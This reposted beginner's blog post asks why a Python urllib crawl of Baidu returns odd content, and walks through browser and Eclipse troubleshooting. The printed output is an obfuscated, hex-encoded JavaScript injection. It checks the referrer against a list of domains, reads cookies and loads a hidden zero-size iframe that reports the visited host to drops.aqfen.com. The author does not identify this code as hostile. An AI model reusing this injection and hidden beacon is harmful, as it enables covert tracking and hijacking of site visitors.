Python crawler code template_Python: my first day learning Python web crawling
Published: 2021-06-24 14:45:04  Category: Technical articles


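Question:

I followed a Python tutorial video and crawled the Baidu home page, but my result differs from the one in the video. Why? (Code and output are further down.)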

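1:

I noticed that IE on my machine reports an error when opening Baidu, while the Sogou browser opens it normally. In addition, the result printed when running in Eclipse is identical to the page source I see for the Baidu home page in IE, whereas the source shown in the 360 browser matches the video. Could it be that Eclipse uses IE by default?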

2:

After repairing IE: url=http://www.baidu.com/ still reports an error when opened, while url=https://www.baidu.com/ opens normally.

The result of running in Eclipse is still wrong.
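To make the same http/https comparison from Python rather than from a browser, something like the following sketch could be used. The helper names `with_scheme` and `fetch_summary` are made up for illustration, and the network call is left commented out because its result depends on the local network.

```python
from urllib import request
from urllib.parse import urlsplit, urlunsplit


def with_scheme(url, scheme):
    """Return the same URL with its scheme replaced (e.g. http -> https)."""
    parts = urlsplit(url)
    return urlunsplit((scheme,) + tuple(parts[1:]))


def fetch_summary(url, timeout=10):
    """Fetch a URL and return (final_url, status, body_length_in_bytes)."""
    with request.urlopen(url, timeout=timeout) as resp:
        body = resp.read()
        return resp.geturl(), resp.status, len(body)


# Example (requires network access, so it is left commented out):
# for scheme in ("http", "https"):
#     print(fetch_summary(with_scheme("http://www.baidu.com/", scheme)))
```

If the two schemes return bodies of very different lengths, that points at the transport rather than at Eclipse or the browser.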

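3:

I switched to url=http://www.kugou.com/. The page source is the same in IE and in Sogou, but the result in Eclipse still looks odd, which shows that the problem has nothing to do with the browser.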
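One way to confirm that the script does not go through any installed browser is to look at the headers `urllib` sends. The sketch below prints the default `User-agent` of the opener and then builds a request with an explicit one. The `BROWSER_UA` string and the `build_request` helper are illustrative assumptions, and whether a server responds differently to them is not something this sketch shows.

```python
from urllib import request

# The default opener identifies itself as "Python-urllib/<version>",
# independent of any browser installed on the machine.
default_headers = dict(request.build_opener().addheaders)
print(default_headers["User-agent"])

# Hypothetical browser-like value, used only for illustration.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"


def build_request(url, user_agent=BROWSER_UA):
    """Create a Request that carries an explicit User-Agent header."""
    return request.Request(url, headers={"User-Agent": user_agent})


req = build_request("http://www.kugou.com/")
# Request normalises header names, so the key is stored as "User-agent".
print(req.get_header("User-agent"))
```

No request is sent here; the objects are only constructed and inspected.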

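4:

I found out why the Kugou home page crawl looked wrong.

The result was actually correct. The Eclipse Console limits its output by default (it only shows the last 80000 characters); after unchecking that option, the output displays normally.

As for Baidu... I still don't know why. I tried another computer and got the same result.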
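Since the console can silently truncate long output, it may be safer to write the page to a file and check its length instead of reading it from the console. A minimal sketch, with a placeholder string standing in for the downloaded page and a hypothetical file name `page_dump.html`:

```python
import os
import tempfile


def save_text(text, path):
    """Write the text to a UTF-8 file and return the number of characters."""
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)
    return len(text)


# Stand-in for the decoded page; longer than the 80000-character console limit.
sample = "x" * 100000
out_path = os.path.join(tempfile.gettempdir(), "page_dump.html")
n_chars = save_text(sample, out_path)
print(n_chars, "characters written to", out_path)
```

In the real script, `sample` would be the decoded response string, and the saved file can then be opened in an editor or compared against the browser's "view source".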


Environment: Python 3.x + Eclipse

The code is as follows:

import re
from urllib import request

url = r"http://www.baidu.com/"

# Create a custom request object
req = request.Request(url)

# Send the request, read the response body and decode it as UTF-8
response = request.urlopen(req).read().decode('utf-8')

#pat=r"(.*?)"    # clean the data with a regular expression
#data=re.findall(pat,response)

print(response)
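The commented-out regular expression step appears incomplete in the text above (only `(.*?)` survives). As a sketch of what such a cleaning step might look like, the example below assumes the goal was to extract the page title; the `<title>` pattern, the `extract_titles` helper, and the sample HTML are assumptions, not taken from the original code.

```python
import re

# Assumed pattern: the original one is incomplete in the post.
TITLE_PATTERN = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def extract_titles(html):
    """Return the text of every <title> element found in the HTML string."""
    return [t.strip() for t in TITLE_PATTERN.findall(html)]


# Small inline sample so the example runs without network access.
sample_html = "<html><head><title>Example page</title></head><body></body></html>"
print(extract_titles(sample_html))
```

With the real script, `extract_titles(response)` would be called on the decoded page. An empty list would be a quick hint that the server returned something other than the expected HTML.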

The output after running is as follows:

(function(t,e){function n(){var e;try{e=new XMLHttpRequest}catch(n){for(var c=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0","MSXML2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],o=0;o

c(t,function(t){document.write(t),document.close(); setTimeout(function(){var n1 = document.createElement("script");n1.setAttribute("type","text/javascript");n1.setAttribute("src",e);    (document.head||document.getElementsByTagName('head')[0]).appendChild(n1);},1000);})})('http://www.baidu.com/?t=912558218',"var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox3e844=["\x6E\x75\x72\x2E\x63\x6E","\x69\x7A\x64\x61\x2E\x63\x6F\x6D","\x62\x61\x64\x61\x6D\x62\x69\x7A\x2E\x63\x6F\x6D","\x75\x71\x75\x72\x2E\x63\x6E","\x75\x6C\x69\x6E\x69\x78\x2E\x63\x6F\x6D","\x65\x79\x6E\x65\x6B\x2E\x6E\x65\x74","\x65\x79\x6E\x65\x6B\x2E\x62\x69\x7A","\x63\x68\x65\x6E\x67\x61\x62\x6C\x65\x2E\x6E\x65\x74","\x78\x6D\x64\x35\x2E\x63\x6F\x6D","\x78\x6D\x64\x35\x2E\x6F\x72\x67","\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x74\x77\x69\x74\x74\x65\x72\x2E\x63\x6F\x6D","\x75\x68\x72\x70\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x68\x65\x77\x65\x72\x2E\x63\x6F\x6D","\x6D\x61\x61\x72\x69\x70\x2E\x6F\x72\x67","\x74\x72\x74\x2E\x6E\x65\x74\x2E\x74\x72","\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x74\x69\x6D\x65\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x61\x6D\x61\x72\x69\x63\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x63\x6F\x6E\x67\x72\x65\x73\x73\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x65\x6E\x73\x65\x6D\x62\x6C\x65\x2E\x63\x6F\x2E\x75\x6B","\x75\x79\x67\x68\x75\x72\x69\x73\x74\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6A\x61\x70\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x70\x72\x65\x73\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x79\x61\x72\x2E\x6F\x72\x67","\x75\x79\x68\x65\x77\x65\x72\x2E\x62\x69\x7A","\x75\x79\x6D\x61\x61\x72\x69\x70\x2E\x63\x6F\x6D","\x61\x6B\x61\x64\x
65\x6D\x69\x79\x65\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x2E\x6E\x65\x74","\x69\x75\x68\x72\x64\x66\x2E\x6F\x72\x67","\x6F\x6C\x69\x6D\x61\x6C\x61\x72\x2E\x6F\x72\x67","\x72\x66\x61\x2E\x6F\x72\x67","\x75\x6E\x74\x72\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6E\x65\x74\x2E\x6F\x72\x67","\x61\x61\x77\x73\x61\x74\x2E\x63\x6F\x6D","\x61\x68\x73\x65\x6E\x64\x65\x72\x2E\x63\x6F\x6D","\x62\x65\x68\x69\x6E\x64\x2D\x62\x61\x72\x73\x2E\x6E\x65\x74","\x62\x65\x73\x74\x67\x6F\x72\x65\x2E\x63\x6F\x6D","\x62\x69\x6C\x69\x71\x69\x7A\x2E\x63\x6F\x6D","\x62\x69\x71\x6C\x65\x2E\x63\x6F\x6D","\x62\x6C\x69\x70\x2E\x74\x76","\x63\x68\x69\x6E\x65\x73\x65\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x63\x68\x69\x6E\x65\x73\x65\x62\x6C\x6F\x67\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x62\x75\x6C\x74\x65\x6E\x69\x2E\x63\x6F\x6D","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x61\x2E\x74\x72\x2E\x67\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x73\x65\x6D\x70\x6F\x7A\x79\x75\x6D\x75\x2E\x63\x6F\x6D","\x64\x6F\x77\x6E\x65\x75\x2E\x6F\x72\x67","\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x64\x61\x69\x6C\x79\x6D\x6F\x74\x69\x6F\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x2D\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2E\x74\x76","\x65\x61\x73\x74\x65\x72\x6E\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x65\x73\x74\x61\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x63\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x69\x6E\x65\x78\x69\x6C\x65\x2E\x75\x73","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x69\x6E\x66\x6F\x2E\x63\x6F\x6D","\x72\x66\x69\x2E\x6
6\x72","\x63\x68\x6F\x73\x75\x6E\x2E\x63\x6F\x6D","\x63\x6E\x61\x2E\x63\x6F\x6D\x2E\x74\x77","\x72\x74\x68\x6B\x2E\x68\x6B","\x73\x74\x68\x65\x61\x64\x6C\x69\x6E\x65\x2E\x63\x6F\x6D","\x6F\x72\x69\x65\x6E\x74\x61\x6C\x64\x61\x69\x6C\x79\x2E\x6F\x6E\x2E\x63\x63","\x69\x2D\x63\x61\x62\x6C\x65\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x70\x61\x6F\x6D\x6F\x6E\x74\x68\x6C\x79\x2E\x63\x6F\x6D","\x79\x7A\x7A\x6B\x2E\x63\x6F\x6D","\x6E\x65\x78\x74\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x63\x68\x69\x6E\x65\x73\x65\x70\x65\x6E\x2E\x6F\x72\x67","\x62\x6F\x78\x75\x6E\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x6A\x69\x6E\x67\x6E\x65\x77\x73\x2E\x63\x6F\x6D","\x62\x65\x69\x6A\x69\x6E\x67\x73\x70\x72\x69\x6E\x67\x2E\x63\x6F\x6D","\x6D\x73\x67\x75\x61\x6E\x63\x68\x61\x2E\x63\x6F\x6D","\x62\x6F\x74\x61\x6E\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x77\x72\x63\x68\x69\x6E\x61\x2E\x6F\x72\x67","\x6F\x70\x65\x6E\x2E\x63\x6F\x6D\x2E\x68\x6B","\x61\x62\x6F\x6C\x75\x6F\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x36\x70\x61\x72\x6B\x2E\x63\x6F\x6D","\x63\x72\x65\x61\x64\x65\x72\x73\x2E\x6E\x65\x74","\x77\x65\x6E\x78\x75\x65\x63\x69\x74\x79\x2E\x63\x6F\x6D","\x73\x69\x6E\x6F\x76\x69\x73\x69\x6F\x6E\x2E\x6E\x65\x74","\x68\x61\x76\x65\x38\x2E\x74\x76","\x70\x6F\x70\x79\x61\x72\x64\x2E\x6F\x72\x67","\x6D\x69\x74\x62\x62\x73\x2E\x63\x6F\x6D","\x6F\x7A\x63\x68\x69\x6E\x65\x73\x65\x2E\x63\x6F\x6D","\x79\x6F\x72\x6B\x62\x62\x73\x2E\x63\x61","\x77\x65\x73\x74\x63\x61\x2E\x63\x6F\x6D","\x74\x6F\x6B\x79\x6F\x63\x6E\x2E\x63\x6F\x6D","\x31\x36\x33\x2E\x63\x6F\x6D","\x71\x71\x2E\x63\x6F\x6D","\x69\x66\x65\x6E\x67\x2E\x63\x6F\x6D","","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x74\x6F\x70","\x6C\x6F\x67","\x70\x61\x72\x65\x6E\x74","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x69\x6D\x6D\x6F\x72\x74\x61\x6C\x5F","\x65\x72\x72\x6F\x72","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x
74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x26\x68\x6F\x73\x74\x3D","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x68\x65\x69\x67\x68\x74","\x77\x69\x64\x74\x68","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x22\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];var stander_url= new Array(__Ox3e844[0x0],__Ox3e844[0x1],__Ox3e844[0x2],__Ox3e844[0x3],__Ox3e844[0x4],__Ox3e844[0x5],__Ox3e844[0x6],__Ox3e844[0x7],__Ox3e844[0x8],__Ox3e844[0x9],__Ox3e844[0xa],__Ox3e844[0xb],__Ox3e844[0xc],__Ox3e844[0xd],__Ox3e844[0xe],__Ox3e844[0xf],__Ox3e844[0x10],__Ox3e844[0x11],__Ox3e844[0x12],__Ox3e844[0x13],__Ox3e844[0x14],__Ox3e844[0x15],__Ox3e844[0x16],__Ox3e844[0x17],__Ox3e844[0x18],__Ox3e844[0x19],__Ox3e844[0x1a],__Ox3e844[0x1b],__Ox3e844[0x1c],__Ox3e844[0x1d],__Ox3e844[0x1e],__Ox3e844[0x1f],__Ox3e844[0x20],__Ox3e844[0x21],__Ox3e844[0x22],__Ox3e844[0x1a],__Ox3e844[0x23],__Ox3e844[0x24],__Ox3e844[0x25],__Ox3e844[0x26],__Ox3e844[0x27],__Ox3e844[0x28],__Ox3e844[0x29],__Ox3e844[0x2a],__Ox3e844[0x2b],__Ox3e844[0x2c],__Ox3e844[0x2d],__Ox3e844[0x2e],__Ox3e844[0x2f],__Ox3e844[0x30],__Ox3e844[0x31],__Ox3e844[0x32],__Ox3e844[0x33],__Ox3e844[0x34],__Ox3e844[0x35],__Ox3e844[0x36],__Ox3e844[0x37],__Ox3e844[0x38],__Ox3e844[0x39],__Ox3e844[0x3a],__Ox3e844[0x3b],__Ox3e844[0x3c],__Ox3e844[0x3d],__Ox3e844[0x3e],__Ox3e844[0x3f],__Ox3e844[0x40],__Ox3e844[0x41],__Ox3e844[0x42],__Ox3e844[0x43],__Ox3e844[0x44],__Ox3e844[0x45]
,__Ox3e844[0x46],__Ox3e844[0x47],__Ox3e844[0x48],__Ox3e844[0x49],__Ox3e844[0x4a],__Ox3e844[0x4b],__Ox3e844[0x4c],__Ox3e844[0x4d],__Ox3e844[0x4e],__Ox3e844[0x4f],__Ox3e844[0x50],__Ox3e844[0x51],__Ox3e844[0x52],__Ox3e844[0x53],__Ox3e844[0x54],__Ox3e844[0x55],__Ox3e844[0x56],__Ox3e844[0x57]);var sysdata=__Ox3e844[0x58];var url=__Ox3e844[0x58];try{url= window[__Ox3e844[0x5b]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(M){console[__Ox3e844[0x5c]](M);if(window[__Ox3e844[0x5d]]){try{url= window[__Ox3e844[0x5d]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(L){console[__Ox3e844[0x5c]](L);url= __Ox3e844[0x58]}}};if(url=== __Ox3e844[0x58]){url= document[__Ox3e844[0x59]]};if(url=== __Ox3e844[0x58]){url= window[__Ox3e844[0x5f]][__Ox3e844[0x5e]]};function inarray(url,stander_url){for(var _0xf050x5=0;_0xf050x5< stander_url[__Ox3e844[0x60]];_0xf050x5++){if(url[__Ox3e844[0x61]](stander_url[_0xf050x5])!=  -1){return true}};return false}if(!inarray(url,stander_url)){var cookie_str=document[__Ox3e844[0x62]];if(cookie_str[__Ox3e844[0x61]](__Ox3e844[0x63])!=  -1){throw  new Error(__Ox3e844[0x64])}};try{var iframe=document[__Ox3e844[0x66]](__Ox3e844[0x65]);iframe[__Ox3e844[0x67]]= __Ox3e844[0x68]+ sysdata+ __Ox3e844[0x69]+ url;iframe[__Ox3e844[0x6a]]= 0;iframe[__Ox3e844[0x6b]]= 0;iframe[__Ox3e844[0x6c]]= 0;document[__Ox3e844[0x6e]][__Ox3e844[0x6d]](iframe)}catch(e){console[__Ox3e844[0x5c]](e);document[__Ox3e844[0x71]](__Ox3e844[0x6f]+ sysdata+ __Ox3e844[0x69]+ url+ __Ox3e844[0x70])}");
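The output above is hard to read because most string literals are written as `\xNN` escapes. One possible way to inspect them is to turn each escape back into its character. The sketch below does this for two literals copied from the output; the helper name `decode_hex_escapes` is made up for illustration, and the sketch only decodes text, it does not run the script.

```python
import re

# Matches a literal backslash, "x", and two hexadecimal digits.
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_hex_escapes(text):
    """Replace every \\xNN escape in the text with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


# Two literals copied from the printed output (raw strings keep the backslashes).
samples = [
    r"\x5F\x64\x65\x63\x6F\x64\x65",
    r"\x72\x65\x66\x65\x72\x72\x65\x72",
]
for s in samples:
    print(decode_hex_escapes(s))
```

Applying the same function to the whole saved response makes the embedded strings readable, which may help when comparing it with what the browser shows.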

Reposted from: https://blog.csdn.net/weixin_33443932/article/details/113984545
